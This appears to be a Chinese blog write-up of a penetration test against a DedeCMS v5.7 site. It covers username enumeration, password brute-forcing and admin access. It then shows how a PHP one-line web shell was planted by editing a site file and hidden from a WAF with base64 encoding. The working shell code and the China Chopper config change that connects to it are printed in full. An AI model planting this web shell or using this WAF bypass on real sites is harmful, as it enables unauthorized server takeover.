记一次织梦cms渗透测试

记一次织梦cms渗透测试

 

0x01 前言

本次测试的整个流程：枚举用户名  -  针对性暴破  -  登录后台  -  后台编辑php文件getshell。

0x02 过程

1、登录功能模块存在用户名枚举缺陷，利用此权限先枚举出用户名

 

2、登录功能模块无验证码，通过枚举出的用户名暴力破解出相应密码。并登录后台（dedecms v57）

 

3、开始遇到坑了。文件式管理器上传文件和新增广告等方式都无法getshell（貌似有waf）。一有动作，连接就会重置。

 

4、尝试直接编辑原有文件，将代码写入。

（1）写入phpinfo();可以成功

 

（2）写入常规一句话也能成功，但是执行时，连接会被重置

（3）写入base64编码一句话<?php @eval(base64_decode($_POST[‘0nth3way’]));?>，将数据编码后就可以成功执行了

5、菜刀修改配置文件caidao.conf如下，便可连接一句话木马。

<PHP_BASE>
ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s
</PHP_BASE>

 

6、菜刀成功连上一句话。权限：IIS用户

 

7、看到一个名为wkds.exe的进程，感觉是防护软件，没有深究。

8、第二天就凉了。

（1）马子还在，菜刀连不上了。能执行phpinfo();，不能执行system(‘whoami’)，查看phpinfo也没有禁用相关函数啊。问号脸？？？求解答0.0

 

（2）后台也无法编辑文件了

0x03 后记

本此测试get到几点：

（1）流量数据可编码绕过waf，菜刀改配置连接。

（2）及时行乐